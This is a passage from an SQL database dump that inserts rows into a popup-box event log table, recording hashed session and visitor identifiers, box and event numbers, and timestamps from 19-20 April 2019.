(80491, '20e0a785177afb5df529ccdd57c6ca63', 'e3ad3b0cac84f8a3', 0, 2, 1, '2019-04-19 18:28:26'),
(80492, 'f5e3b4d54e12b06e1b6687de150e2ad2', '71a9bc493c887fe8', 0, 2, 1, '2019-04-19 18:28:27'),
(80493, '303cde3a1f87908f03f1223a7ac9e93b', '3de88ff4581dab27', 0, 2, 1, '2019-04-19 18:28:45'),
(80494, '303cde3a1f87908f03f1223a7ac9e93b', '3de88ff4581dab27', 0, 2, 1, '2019-04-19 18:28:57'),
(80495, '16f3fcfc6526c71ed109161a7924c37c', 'eb0df83514b09317', 0, 2, 1, '2019-04-19 18:29:15'),
(80496, '1cc0f35e743b32565c966d1c0ae4d360', 'e996039688368fa6', 0, 2, 1, '2019-04-19 18:29:26'),
(80497, '11053f076e09c87779446964646308e0', 'd7d80f86fea1400a', 0, 2, 1, '2019-04-19 18:31:15'),
(80498, '11053f076e09c87779446964646308e0', 'd7d80f86fea1400a', 0, 2, 1, '2019-04-19 18:31:33'),
(80499, 'f0533a40d8a840cf1ef644f6e13328f5', '28fc1ed988ae4f11', 0, 2, 1, '2019-04-19 18:32:12'),
(80500, '82e0d7075d84bb7a655050de2d2ecd69', '0b1466b4de9b8a16', 0, 2, 1, '2019-04-19 18:32:34'),
(80501, '2ec4f8c8d32a0094713d9ea507e57349', '6148fb9d2849eccf', 0, 2, 1, '2019-04-19 18:32:57'),
(80502, 'be5eda5ea736e966e7366693ce9a6f61', '38037cb31b3b9fc2', 0, 2, 1, '2019-04-19 18:33:13'),
(80503, '82f443ebc856796578dc45cd655c0dab', 'dd85277cbb7da2c1', 0, 2, 1, '2019-04-19 18:33:24'),
(80504, '250fae80de61d8e25152302b72e5513c', '5716bfdec5db86c3', 0, 2, 1, '2019-04-19 18:33:48'),
(80505, '629b526221711eddaa78478513f917f0', '781d28e27974f180', 0, 2, 1, '2019-04-19 18:35:07'),
(80506, 'f13e065e001328de4c8a323ade907d65', '846dcc220c9d1cd7', 0, 2, 1, '2019-04-19 18:35:14'),
(80507, '11053f076e09c87779446964646308e0', 'd7d80f86fea1400a', 0, 2, 1, '2019-04-19 18:35:52'),
(80508, '4f6da1dfaf8f5c505061570462039ecb', '939fbcee39b8c410', 0, 2, 1, '2019-04-19 18:36:32'),
(80509, 'c637f7f2ae78cfefc1e20003cb74dfa3', 'e9d10c7f7af3c7c6', 0, 2, 1, '2019-04-19 18:36:50'),
(80510, '31bb5fffd0e8b9059d04d6c0bcba843c', 'edfe950d47379572', 0, 2, 1, '2019-04-19 18:37:32'),
(80511, 'e1fea71a782fc5fa48c15934d2560f06', 'f556605047b35dd8', 0, 2, 1, '2019-04-19 18:37:32'),
(80512, '31bb5fffd0e8b9059d04d6c0bcba843c', 'edfe950d47379572', 0, 2, 1, '2019-04-19 18:37:38'),
(80513, '34645ca20ae869ee4104b4d7c313dc53', '135f23c8a85974ba', 0, 2, 1, '2019-04-19 18:38:19'),
(80514, '52ad9281ee9b76a324c65eecccafecf9', '539b96bddb15c5b0', 0, 2, 1, '2019-04-19 18:38:30'),
(80515, '2ec4f8c8d32a0094713d9ea507e57349', '6148fb9d2849eccf', 0, 2, 1, '2019-04-19 18:39:39'),
(80516, 'c5ea0220793843a28ddfd0ec2d55bef7', 'd21481c798446d7b', 0, 2, 1, '2019-04-19 18:39:52'),
(80517, '8eb8c00500f6ef391fc5d137b27cab18', '0b797fb53ae15810', 0, 2, 1, '2019-04-19 18:40:24'),
(80518, '629b526221711eddaa78478513f917f0', '781d28e27974f180', 0, 2, 1, '2019-04-19 18:41:20'),
(80519, 'c6523184656d4f9516110e00bf55fa99', '0315a9e8bb354f60', 0, 2, 1, '2019-04-19 18:41:42'),
(80520, 'fcbf2aef370d3fa0153403dd56a8a3f2', '6e117bd555667400', 0, 2, 1, '2019-04-19 18:42:39'),
(80521, 'fcbf2aef370d3fa0153403dd56a8a3f2', '6e117bd555667400', 0, 2, 1, '2019-04-19 18:42:56'),
(80522, '4af320651c0197c14bfff060c643b990', '3f487fdbfc9b63c7', 0, 2, 1, '2019-04-19 18:43:49'),
(80523, 'b0b35ccc726cb2466d80164399a68a63', '612bba3825f89eda', 0, 2, 1, '2019-04-19 18:44:02'),
(80524, 'b0b35ccc726cb2466d80164399a68a63', '612bba3825f89eda', 0, 2, 1, '2019-04-19 18:44:39'),
(80525, '2ec4f8c8d32a0094713d9ea507e57349', '6148fb9d2849eccf', 0, 2, 1, '2019-04-19 18:44:58'),
(80526, '2ec4f8c8d32a0094713d9ea507e57349', '6148fb9d2849eccf', 0, 2, 1, '2019-04-19 18:45:10'),
(80527, 'fcbf2aef370d3fa0153403dd56a8a3f2', '6e117bd555667400', 0, 2, 1, '2019-04-19 18:45:28'),
(80528, '4cca16ad5591afa0536b74c48c409401', 'e567435cac654a90', 0, 2, 1, '2019-04-19 18:47:04'),
(80529, '812b8fac7eef99d79f1b24a3c44bb423', '608ea89c6400787c', 0, 2, 1, '2019-04-19 18:48:13'),
(80530, '7ea943c7ef7fe9a9e4511a7b705c6e8b', '8fcbcbf2903f3023', 0, 2, 1, '2019-04-19 18:49:22'),
(80531, '2ec4f8c8d32a0094713d9ea507e57349', '6148fb9d2849eccf', 0, 2, 1, '2019-04-19 18:53:08'),
(80532, '2ec4f8c8d32a0094713d9ea507e57349', '6148fb9d2849eccf', 0, 2, 1, '2019-04-19 18:54:58'),
(80533, 'b8d44b90a71651317bac2cb2f407fe91', '6ae1180d83882097', 0, 2, 1, '2019-04-19 18:55:42'),
(80534, '9678d666be3fc9ac46d157d2ebff16e0', '0a3c059ff9af6559', 0, 2, 1, '2019-04-19 18:56:43'),
(80535, '2ec4f8c8d32a0094713d9ea507e57349', '6148fb9d2849eccf', 0, 2, 1, '2019-04-19 18:57:05'),
(80536, '52885af809f783151b0bfaf080a1a3ae', 'b50d65df97c0251e', 0, 2, 1, '2019-04-19 18:59:13'),
(80537, '65ebd005c3c5b417278a266bc783e9e1', '59bb5978882acfd8', 0, 2, 1, '2019-04-19 18:59:20'),
(80538, 'bc6410418ae549c8b31522a6fa0ea8e9', 'e3413f2163c4f64a', 0, 2, 1, '2019-04-19 19:01:09'),
(80539, 'bc6410418ae549c8b31522a6fa0ea8e9', 'e3413f2163c4f64a', 0, 2, 1, '2019-04-19 19:01:15'),
(80540, '52ad9281ee9b76a324c65eecccafecf9', '539b96bddb15c5b0', 0, 2, 1, '2019-04-19 19:01:42'),
(80541, 'c966b1b44f5b6dacf4461f138611ea3e', '7a636002c64226bf', 0, 2, 1, '2019-04-19 19:04:51'),
(80542, 'c966b1b44f5b6dacf4461f138611ea3e', '7a636002c64226bf', 0, 2, 1, '2019-04-19 19:05:04'),
(80543, '52ad9281ee9b76a324c65eecccafecf9', '539b96bddb15c5b0', 0, 2, 1, '2019-04-19 19:05:52'),
(80544, 'afc9769cd70285ca00264e8b73df86b8', 'b2bafb74467116e9', 0, 2, 1, '2019-04-19 19:10:45'),
(80545, '9678d666be3fc9ac46d157d2ebff16e0', '0a3c059ff9af6559', 0, 2, 1, '2019-04-19 19:11:50'),
(80546, '4cca16ad5591afa0536b74c48c409401', 'e567435cac654a90', 0, 2, 1, '2019-04-19 19:12:01'),
(80547, '52ad9281ee9b76a324c65eecccafecf9', '539b96bddb15c5b0', 0, 2, 1, '2019-04-19 19:13:22'),
(80548, '2ec4f8c8d32a0094713d9ea507e57349', '6148fb9d2849eccf', 0, 2, 1, '2019-04-19 19:16:45'),
(80549, '68e2382b4feb47aa5873a360cbea5b57', 'cc7f26f17ab3f34d', 0, 2, 1, '2019-04-19 19:21:14'),
(80550, '68e2382b4feb47aa5873a360cbea5b57', 'cc7f26f17ab3f34d', 0, 2, 1, '2019-04-19 19:21:23'),
(80551, '9a1156781934dbe458269325e8f1e350', '863b661787591b2d', 0, 2, 1, '2019-04-19 19:21:23'),
(80552, '63152b78bd2a2bb670a5ac8e1191e1fc', '8c117e9ade9703d1', 0, 2, 1, '2019-04-19 19:23:24');
INSERT INTO `y57u5_rstbox_logs` (`id`, `sessionid`, `visitorid`, `user`, `box`, `event`, `date`) VALUES
(80553, 'd5309b486613531bb09ce03174a07d96', '781d28e27974f180', 0, 2, 1, '2019-04-19 19:26:20'),
(80554, '2ec4f8c8d32a0094713d9ea507e57349', '6148fb9d2849eccf', 0, 2, 1, '2019-04-19 19:26:51'),
(80555, '762d15fbe033393a76b9446f46934877', '1de090ec808c88cc', 0, 2, 1, '2019-04-19 19:29:54'),
(80556, 'bc6410418ae549c8b31522a6fa0ea8e9', 'e3413f2163c4f64a', 0, 2, 1, '2019-04-19 19:31:31'),
(80557, '255494f5563372b5dde57c001c37522a', '0a3c059ff9af6559', 0, 2, 1, '2019-04-19 19:31:38'),
(80558, '0da52e3440ae837ca94c6e6efb31f600', '783fd86b98ce10c6', 0, 2, 1, '2019-04-19 19:32:18'),
(80559, '4fc7e3d147916bea76ee42f187bc8d02', '96eb3b4ed73b981e', 0, 2, 1, '2019-04-19 19:35:01'),
(80560, 'f492364e6cbf2449873e58d026747d2c', '08a2dcfd15a78e6c', 0, 2, 1, '2019-04-19 19:36:14'),
(80561, 'a5dd09f69fe0c9466a7e764de7ae1f3c', 'aa8341efc297592d', 0, 2, 1, '2019-04-19 19:40:39'),
(80562, '65ebd005c3c5b417278a266bc783e9e1', '59bb5978882acfd8', 0, 2, 1, '2019-04-19 19:48:49'),
(80563, '65ebd005c3c5b417278a266bc783e9e1', '59bb5978882acfd8', 0, 2, 1, '2019-04-19 19:48:55'),
(80564, '7b8fcfffc1979d1265212c25fc886642', '66a36e20632e2653', 0, 2, 1, '2019-04-19 19:50:30'),
(80565, '7b8fcfffc1979d1265212c25fc886642', '66a36e20632e2653', 0, 2, 1, '2019-04-19 19:53:01'),
(80566, '7b8fcfffc1979d1265212c25fc886642', '66a36e20632e2653', 0, 2, 1, '2019-04-19 19:53:05'),
(80567, '184339b2b73e81a93e013c467d4bca9a', '18850e200f1399f1', 0, 2, 1, '2019-04-19 19:54:50'),
(80568, '184339b2b73e81a93e013c467d4bca9a', '18850e200f1399f1', 0, 2, 1, '2019-04-19 19:55:07'),
(80569, 'd12858d94ba367561c6b381e573ac430', 'f19010d8a5f137d0', 0, 2, 1, '2019-04-19 19:55:28'),
(80570, '184339b2b73e81a93e013c467d4bca9a', '18850e200f1399f1', 0, 2, 1, '2019-04-19 20:07:05'),
(80571, 'c9838bdb0a70c913f441ab10bf6842f1', '745751712b339964', 0, 2, 1, '2019-04-19 20:07:36'),
(80572, 'c9838bdb0a70c913f441ab10bf6842f1', '745751712b339964', 0, 2, 1, '2019-04-19 20:11:28'),
(80573, 'c9838bdb0a70c913f441ab10bf6842f1', '745751712b339964', 0, 2, 1, '2019-04-19 20:12:41'),
(80574, 'c9838bdb0a70c913f441ab10bf6842f1', '745751712b339964', 0, 2, 1, '2019-04-19 20:14:29'),
(80575, 'c9838bdb0a70c913f441ab10bf6842f1', '745751712b339964', 0, 2, 1, '2019-04-19 20:14:41'),
(80576, 'c9838bdb0a70c913f441ab10bf6842f1', '745751712b339964', 0, 2, 1, '2019-04-19 20:17:06'),
(80577, '0be2e6d872b0c25a2df6aac20839b731', 'b7f732384cb533aa', 0, 2, 1, '2019-04-19 20:17:15'),
(80578, 'c9838bdb0a70c913f441ab10bf6842f1', '745751712b339964', 0, 2, 1, '2019-04-19 20:18:03'),
(80579, 'c9838bdb0a70c913f441ab10bf6842f1', '745751712b339964', 0, 2, 1, '2019-04-19 20:18:43'),
(80580, 'c9838bdb0a70c913f441ab10bf6842f1', '745751712b339964', 0, 2, 1, '2019-04-19 20:28:30'),
(80581, 'c9838bdb0a70c913f441ab10bf6842f1', '745751712b339964', 0, 2, 1, '2019-04-19 20:33:30'),
(80582, 'ce3780135f3d1be4bfa132740e51faa5', 'a2b92167f54c9dc2', 0, 2, 1, '2019-04-19 20:34:15'),
(80583, 'c9838bdb0a70c913f441ab10bf6842f1', '745751712b339964', 0, 2, 1, '2019-04-19 20:34:43'),
(80584, '184339b2b73e81a93e013c467d4bca9a', '18850e200f1399f1', 0, 2, 1, '2019-04-19 20:39:36'),
(80585, '574569881e27006025ab901df5ff300e', 'e3e471e4852785d8', 0, 2, 1, '2019-04-19 20:44:24'),
(80586, 'c8e024a98f16ec0056450a00cd883d7f', 'b00ce052a9850e4b', 0, 2, 1, '2019-04-19 20:45:21'),
(80587, 'ce3780135f3d1be4bfa132740e51faa5', 'a2b92167f54c9dc2', 0, 2, 1, '2019-04-19 20:55:46'),
(80588, 'ce3780135f3d1be4bfa132740e51faa5', 'a2b92167f54c9dc2', 0, 2, 1, '2019-04-19 20:55:58'),
(80589, '7ab4d403fad3949a724829ede6765821', '7f2af39c024d710b', 0, 2, 1, '2019-04-19 20:59:49'),
(80590, '8fc9b3b7d70379277a19ac7c73f59bd8', '1964ee6a7cf72a41', 0, 2, 1, '2019-04-19 21:05:53'),
(80591, '8fc9b3b7d70379277a19ac7c73f59bd8', '1964ee6a7cf72a41', 0, 2, 1, '2019-04-19 21:06:33'),
(80592, '8fc9b3b7d70379277a19ac7c73f59bd8', '1964ee6a7cf72a41', 0, 2, 1, '2019-04-19 21:08:09'),
(80593, '85bf13bb0d56ee1f72ca5d3a1a3bf170', '64a658fbde059399', 0, 2, 1, '2019-04-19 21:15:27'),
(80594, '1f9e99355b27a8c9f7255098fcf229ca', 'e1d871458f097a28', 0, 2, 1, '2019-04-19 21:16:35'),
(80595, '21b1edd1d7a5369286975de1fca9a85b', '1febf3043a354c53', 0, 2, 1, '2019-04-19 21:26:55'),
(80596, '0bffa6babd7f141cb0e4a85ef5787991', 'dba49dcafdc2b991', 0, 2, 1, '2019-04-19 21:31:25'),
(80597, 'ad8e5c31b8c408e12a4583dd3e5ed0b3', '072d5390d2d1f89c', 0, 2, 1, '2019-04-19 21:47:14'),
(80598, '89ed5f0c88f36133fef201660b275bac', 'a30c08bfcb146c2b', 0, 2, 1, '2019-04-19 21:56:31'),
(80599, '89ed5f0c88f36133fef201660b275bac', 'a30c08bfcb146c2b', 0, 2, 1, '2019-04-19 21:56:39'),
(80600, '89ed5f0c88f36133fef201660b275bac', 'a30c08bfcb146c2b', 0, 2, 1, '2019-04-19 21:56:44'),
(80601, '89ed5f0c88f36133fef201660b275bac', 'a30c08bfcb146c2b', 0, 2, 1, '2019-04-19 21:56:56'),
(80602, '412086684488a7bfccb0b19f5684f33d', 'ed0ba03b063f9589', 0, 2, 1, '2019-04-19 21:57:55'),
(80603, 'ad8e5c31b8c408e12a4583dd3e5ed0b3', '072d5390d2d1f89c', 0, 2, 1, '2019-04-19 21:58:02'),
(80604, 'ad8e5c31b8c408e12a4583dd3e5ed0b3', '072d5390d2d1f89c', 0, 2, 1, '2019-04-19 22:08:47'),
(80605, '412086684488a7bfccb0b19f5684f33d', 'ed0ba03b063f9589', 0, 2, 1, '2019-04-19 22:11:26'),
(80606, '412086684488a7bfccb0b19f5684f33d', 'ed0ba03b063f9589', 0, 2, 1, '2019-04-19 22:12:40'),
(80607, '184339b2b73e81a93e013c467d4bca9a', '18850e200f1399f1', 0, 2, 1, '2019-04-19 22:21:09'),
(80608, '89ed5f0c88f36133fef201660b275bac', 'a30c08bfcb146c2b', 0, 2, 1, '2019-04-19 22:22:55'),
(80609, '70752d9cd8b086dba0bc84a513761a65', 'c5b27d2acf4d63c1', 0, 2, 1, '2019-04-19 22:27:52'),
(80610, 'ad8e5c31b8c408e12a4583dd3e5ed0b3', '072d5390d2d1f89c', 0, 2, 1, '2019-04-19 22:42:48'),
(80611, '65c896c5c83e8feb8901fa099188ada7', 'f953c11a6a36afb6', 0, 2, 1, '2019-04-19 22:54:22'),
(80612, '65c896c5c83e8feb8901fa099188ada7', 'f953c11a6a36afb6', 0, 2, 1, '2019-04-19 22:55:02'),
(80613, '65c896c5c83e8feb8901fa099188ada7', 'f953c11a6a36afb6', 0, 2, 1, '2019-04-19 22:55:38'),
(80614, '65c896c5c83e8feb8901fa099188ada7', 'f953c11a6a36afb6', 0, 2, 1, '2019-04-19 22:56:08'),
(80615, '65c896c5c83e8feb8901fa099188ada7', 'f953c11a6a36afb6', 0, 2, 1, '2019-04-19 22:57:58'),
(80616, 'bda2c9b5eda69fd190650b6bbf371f64', 'c708ea201ca66e50', 0, 2, 1, '2019-04-19 23:05:15'),
(80617, 'bda2c9b5eda69fd190650b6bbf371f64', 'c708ea201ca66e50', 0, 2, 1, '2019-04-19 23:07:44'),
(80618, 'cf775031fc6100f6fcf2d3814853c8c2', 'd7d80f86fea1400a', 0, 2, 1, '2019-04-19 23:08:26'),
(80619, '58e912474313d63dcd4d6fd3aee58174', 'd38cc91fa3f0e98a', 0, 2, 1, '2019-04-19 23:15:58'),
(80620, '58e912474313d63dcd4d6fd3aee58174', 'd38cc91fa3f0e98a', 0, 2, 1, '2019-04-19 23:16:28'),
(80621, '89ed5f0c88f36133fef201660b275bac', 'a30c08bfcb146c2b', 0, 2, 1, '2019-04-19 23:32:59'),
(80622, '89ed5f0c88f36133fef201660b275bac', 'a30c08bfcb146c2b', 0, 2, 1, '2019-04-19 23:33:11'),
(80623, 'c8e024a98f16ec0056450a00cd883d7f', 'b00ce052a9850e4b', 0, 2, 1, '2019-04-19 23:36:17'),
(80624, 'c8e024a98f16ec0056450a00cd883d7f', 'b00ce052a9850e4b', 0, 2, 1, '2019-04-19 23:36:49'),
(80625, 'c8e024a98f16ec0056450a00cd883d7f', 'b00ce052a9850e4b', 0, 2, 1, '2019-04-19 23:37:13'),
(80626, '89ed5f0c88f36133fef201660b275bac', 'a30c08bfcb146c2b', 0, 2, 1, '2019-04-19 23:38:11'),
(80627, '89ed5f0c88f36133fef201660b275bac', 'a30c08bfcb146c2b', 0, 2, 1, '2019-04-19 23:38:17'),
(80628, '89ed5f0c88f36133fef201660b275bac', 'a30c08bfcb146c2b', 0, 2, 1, '2019-04-19 23:39:48'),
(80629, '89ed5f0c88f36133fef201660b275bac', 'a30c08bfcb146c2b', 0, 2, 1, '2019-04-19 23:40:01'),
(80630, '2b5c04c083e9e566ab6eb6cd2547555c', 'c38b149eecfa3fd8', 0, 2, 1, '2019-04-19 23:40:05'),
(80631, '89ed5f0c88f36133fef201660b275bac', 'a30c08bfcb146c2b', 0, 2, 1, '2019-04-19 23:41:06'),
(80632, '89ed5f0c88f36133fef201660b275bac', 'a30c08bfcb146c2b', 0, 2, 1, '2019-04-19 23:41:19'),
(80633, '89ed5f0c88f36133fef201660b275bac', 'a30c08bfcb146c2b', 0, 2, 1, '2019-04-19 23:41:35'),
(80634, '89ed5f0c88f36133fef201660b275bac', 'a30c08bfcb146c2b', 0, 2, 1, '2019-04-19 23:41:41'),
(80635, '57bd45a4a27d13b28b642a8625e49816', '0dc7038f4ed45412', 0, 2, 1, '2019-04-20 00:22:48'),
(80636, 'ab1e347a84e65479777b8d24ba6e5d27', 'b00ce052a9850e4b', 0, 2, 1, '2019-04-20 00:39:34'),
(80637, '47f3d6c5ce350d4cdd9f1059455f9727', '3620152b6fc866d2', 0, 2, 1, '2019-04-20 00:47:19'),
(80638, 'ab1e347a84e65479777b8d24ba6e5d27', 'b00ce052a9850e4b', 0, 2, 1, '2019-04-20 00:53:38'),
(80639, '83aefdffda169e1a1e1257b5544d5b57', '65962c28608ed032', 0, 2, 1, '2019-04-20 01:15:15'),
(80640, '672e45629fff59c73750d07bf27670a1', 'edfe950d47379572', 0, 2, 1, '2019-04-20 01:40:55'),
(80641, '672e45629fff59c73750d07bf27670a1', 'edfe950d47379572', 0, 2, 1, '2019-04-20 01:41:02'),
(80642, '7b4689d86cb14432e3bb6fb06c1cc5f2', '671606fe3f47531d', 0, 2, 1, '2019-04-20 02:19:24'),
(80643, '3a5ce065cd49936d98cfa9027eac7600', 'ddd2ba58d2b27d5b', 0, 2, 1, '2019-04-20 02:45:16'),
(80644, 'd61f6d2a0b74473aebeca1bc7080cb62', 'c25394c4a195519e', 0, 2, 1, '2019-04-20 02:57:23'),
(80645, '65a0dcd2cc57d81da53d58ed77a56564', '9a4df68c095950e8', 0, 2, 1, '2019-04-20 03:11:07'),
(80646, '672cbf1c5d1db5f20b7162bad606d567', '7795009c6d78e607', 0, 2, 1, '2019-04-20 03:30:29'),
(80647, '852b46197097a4a2848c4d4aa5d5d95b', '85c87c6892dfb12d', 0, 2, 1, '2019-04-20 04:44:47'),
(80648, 'd5affb771be23cbfd053c077eb0c3cea', '2622b37d94f09b78', 0, 2, 1, '2019-04-20 04:47:33'),
(80649, 'd5affb771be23cbfd053c077eb0c3cea', '2622b37d94f09b78', 0, 2, 1, '2019-04-20 04:47:38'),
(80650, 'b1f2aee362906069dcdce3793c074cdf', 'b4e5d447b0500ad0', 0, 2, 1, '2019-04-20 04:48:06'),
(80651, 'b1f2aee362906069dcdce3793c074cdf', 'b4e5d447b0500ad0', 0, 2, 1, '2019-04-20 04:48:14'),
(80652, 'd5affb771be23cbfd053c077eb0c3cea', '2622b37d94f09b78', 0, 2, 1, '2019-04-20 04:52:03'),
(80653, 'd5affb771be23cbfd053c077eb0c3cea', '2622b37d94f09b78', 0, 2, 1, '2019-04-20 04:52:19'),
(80654, 'eb23e4d34f3a4f5c0cd0181cabc9acbd', '5b7cb808058b2f76', 0, 2, 1, '2019-04-20 04:55:04'),
(80655, 'eb23e4d34f3a4f5c0cd0181cabc9acbd', '5b7cb808058b2f76', 0, 2, 1, '2019-04-20 04:55:07'),
(80656, '9354dcc3832450959fc85265c747740d', 'd21481c798446d7b', 0, 2, 1, '2019-04-20 05:07:10'),
(80657, '19d9b20ea582da5522de6fd383f78f24', 'dee0189c9a93ff94', 0, 2, 1, '2019-04-20 05:14:38'),
(80658, '09c1ba26b707e223eff7730ff4dde15e', 'f12c2c61072c9fbe', 0, 2, 1, '2019-04-20 05:31:30'),
(80659, '09c1ba26b707e223eff7730ff4dde15e', 'f12c2c61072c9fbe', 0, 2, 1, '2019-04-20 05:40:07'),
(80660, '54c44a21268f62b3f0ab290153d20307', '7d3e015101cab243', 0, 2, 1, '2019-04-20 05:43:31'),
(80661, 'efc406b288eef4796ca2c1f846dcb1ca', '32b63c1bd18cfa84', 0, 2, 1, '2019-04-20 05:43:55'),
(80662, '7b7b5b2bb9fa4ebafb561aaf96c0f0a2', '56f2a0f7edade9d9', 0, 2, 1, '2019-04-20 05:44:33'),
(80663, '7b7b5b2bb9fa4ebafb561aaf96c0f0a2', '56f2a0f7edade9d9', 0, 2, 1, '2019-04-20 05:45:21'),
(80664, '7b7b5b2bb9fa4ebafb561aaf96c0f0a2', '56f2a0f7edade9d9', 0, 2, 1, '2019-04-20 05:45:44'),
(80665, '7b7b5b2bb9fa4ebafb561aaf96c0f0a2', '56f2a0f7edade9d9', 0, 2, 1, '2019-04-20 05:45:58'),
(80666, '7b7b5b2bb9fa4ebafb561aaf96c0f0a2', '56f2a0f7edade9d9', 0, 2, 1, '2019-04-20 05:46:15'),
(80667, '7b7b5b2bb9fa4ebafb561aaf96c0f0a2', '56f2a0f7edade9d9', 0, 2, 1, '2019-04-20 05:46:52'),
(80668, '7b7b5b2bb9fa4ebafb561aaf96c0f0a2', '56f2a0f7edade9d9', 0, 2, 1, '2019-04-20 05:49:35'),
(80669, '7b7b5b2bb9fa4ebafb561aaf96c0f0a2', '56f2a0f7edade9d9', 0, 2, 1, '2019-04-20 05:50:16'),
(80670, '06fbe3cb861ec9e5af222e81e02f0e97', '19bcc476e66aa8b8', 0, 2, 1, '2019-04-20 05:53:38'),
(80671, '06fbe3cb861ec9e5af222e81e02f0e97', '19bcc476e66aa8b8', 0, 2, 1, '2019-04-20 05:57:04'),
(80672, '06fbe3cb861ec9e5af222e81e02f0e97', '19bcc476e66aa8b8', 0, 2, 1, '2019-04-20 05:57:20'),
(80673, 'd5affb771be23cbfd053c077eb0c3cea', '2622b37d94f09b78', 0, 2, 1, '2019-04-20 06:00:00'),
(80674, 'b86206ea4c78b9b6e194e284dd02cb33', 'df27b9a2919a8206', 0, 2, 1, '2019-04-20 06:01:10'),
(80675, 'bc6410418ae549c8b31522a6fa0ea8e9', 'e3413f2163c4f64a', 0, 2, 1, '2019-04-20 06:02:11'),
(80676, 'b94176f7d8072ecd96dd5a6e605674d7', '0d6d214e577e9800', 0, 2, 1, '2019-04-20 06:04:13'),
(80677, '998f0078993ce3349fc65fd83a60aad3', 'f444f9c61f6c4684', 0, 2, 1, '2019-04-20 06:05:07'),
(80678, '1b6dd6f554fdc13039380d1b4539853a', 'a88c8206896065a3', 0, 2, 1, '2019-04-20 06:05:10'),
(80679, '06fbe3cb861ec9e5af222e81e02f0e97', '19bcc476e66aa8b8', 0, 2, 1, '2019-04-20 06:07:00'),
(80680, 'bc6410418ae549c8b31522a6fa0ea8e9', 'e3413f2163c4f64a', 0, 2, 1, '2019-04-20 06:07:01'),
(80681, 'd5affb771be23cbfd053c077eb0c3cea', '2622b37d94f09b78', 0, 2, 1, '2019-04-20 06:07:25'),
(80682, 'ac2e8b656d8b032a7d4c36c531a3afcb', '2316fb5c07fc7e67', 0, 2, 1, '2019-04-20 06:07:25'),
(80683, 'ac2e8b656d8b032a7d4c36c531a3afcb', '2316fb5c07fc7e67', 0, 2, 1, '2019-04-20 06:07:39'),
(80684, 'b86206ea4c78b9b6e194e284dd02cb33', 'df27b9a2919a8206', 0, 2, 1, '2019-04-20 06:07:43'),
(80685, 'bc6410418ae549c8b31522a6fa0ea8e9', 'e3413f2163c4f64a', 0, 2, 1, '2019-04-20 06:08:14'),
(80686, 'b86206ea4c78b9b6e194e284dd02cb33', 'df27b9a2919a8206', 0, 2, 1, '2019-04-20 06:09:12'),
(80687, 'dd83a92e21d19faa02fab1ba540d5d06', 'b4ecb18ba7992a18', 0, 2, 1, '2019-04-20 06:09:35'),
(80688, 'a2d1c405e86ad4a7cda782d04df90ca2', 'c4c9002176fd8f74', 0, 2, 1, '2019-04-20 06:09:56'),
(80689, 'd5affb771be23cbfd053c077eb0c3cea', '2622b37d94f09b78', 0, 2, 1, '2019-04-20 06:10:23'),
(80690, '4632a266c931575f93863d6abe233121', '8ad24f4e888a3b80', 0, 2, 1, '2019-04-20 06:13:22'),
(80691, '4632a266c931575f93863d6abe233121', '8ad24f4e888a3b80', 0, 2, 1, '2019-04-20 06:13:35'),
(80692, '19d9b20ea582da5522de6fd383f78f24', 'dee0189c9a93ff94', 0, 2, 1, '2019-04-20 06:14:14'),
(80693, 'd5affb771be23cbfd053c077eb0c3cea', '2622b37d94f09b78', 0, 2, 1, '2019-04-20 06:14:43'),
(80694, '2faee28c35e5b702d14744d94f018ef2', '3de88ff4581dab27', 0, 2, 1, '2019-04-20 06:14:57'),
(80695, '19d9b20ea582da5522de6fd383f78f24', 'dee0189c9a93ff94', 0, 2, 1, '2019-04-20 06:15:12'),
(80696, '369c72e17c88e3b07f3008b58a5fb0f1', 'c020abbb40884763', 0, 2, 1, '2019-04-20 06:17:07'),
(80697, 'b1d4694686af4af72a5ccfdcc29ce8cb', 'e996039688368fa6', 0, 2, 1, '2019-04-20 06:17:40'),
(80698, 'a6a64c920c845e5355b073736c805212', 'a30c08bfcb146c2b', 0, 2, 1, '2019-04-20 06:17:48'),
(80699, 'a6a64c920c845e5355b073736c805212', 'a30c08bfcb146c2b', 0, 2, 1, '2019-04-20 06:18:00'),
(80700, '9470527cecb0b3406ff8ce7fc1e0d480', '402692e46d0378b1', 0, 2, 1, '2019-04-20 06:18:41'),
(80701, 'b1d4694686af4af72a5ccfdcc29ce8cb', 'e996039688368fa6', 0, 2, 1, '2019-04-20 06:18:54'),
(80702, 'b94176f7d8072ecd96dd5a6e605674d7', '0d6d214e577e9800', 0, 2, 1, '2019-04-20 06:19:33'),
(80703, '48ba333aba7b756af991ca36e3c20c8a', 'c4c9002176fd8f74', 0, 2, 1, '2019-04-20 06:19:43'),
(80704, '369c72e17c88e3b07f3008b58a5fb0f1', 'c020abbb40884763', 0, 2, 1, '2019-04-20 06:20:47'),
(80705, 'bda2c9b5eda69fd190650b6bbf371f64', 'c708ea201ca66e50', 0, 2, 1, '2019-04-20 06:21:10'),
(80706, '48ba333aba7b756af991ca36e3c20c8a', 'c4c9002176fd8f74', 0, 2, 1, '2019-04-20 06:21:20'),
(80707, '07ef1006c0b8367f47cbf39997b6acd2', '846dcc220c9d1cd7', 0, 2, 1, '2019-04-20 06:22:39'),
(80708, '0a46b5ef1743772bb7a1cb76acc8ed4a', '7501b42c35accff7', 0, 2, 1, '2019-04-20 06:23:07'),
(80709, '4cbc11a3251a38347c913cdb648e03d0', 'e567435cac654a90', 0, 2, 1, '2019-04-20 06:26:19'),
(80710, 'd12858d94ba367561c6b381e573ac430', 'f19010d8a5f137d0', 0, 2, 1, '2019-04-20 06:26:23'),
(80711, 'e46de991bdbbdaa512ea081a1837a484', '390c8ebb4f0af7ce', 0, 2, 1, '2019-04-20 06:27:06'),
(80712, '4cbc11a3251a38347c913cdb648e03d0', 'e567435cac654a90', 0, 2, 1, '2019-04-20 06:27:16'),
(80713, 'd94ad1e88111557f0751a54a1d8dc844', '643628bd9869d64f', 0, 2, 1, '2019-04-20 06:28:31'),
(80714, 'd94ad1e88111557f0751a54a1d8dc844', '643628bd9869d64f', 0, 2, 1, '2019-04-20 06:28:44'),
(80715, 'd5affb771be23cbfd053c077eb0c3cea', '2622b37d94f09b78', 0, 2, 1, '2019-04-20 06:35:37'),
(80716, 'd5affb771be23cbfd053c077eb0c3cea', '2622b37d94f09b78', 0, 2, 1, '2019-04-20 06:35:42'),
(80717, '3b5e781c1fdf11a06c7418a752c3a08e', '38037cb31b3b9fc2', 0, 2, 1, '2019-04-20 06:40:42'),
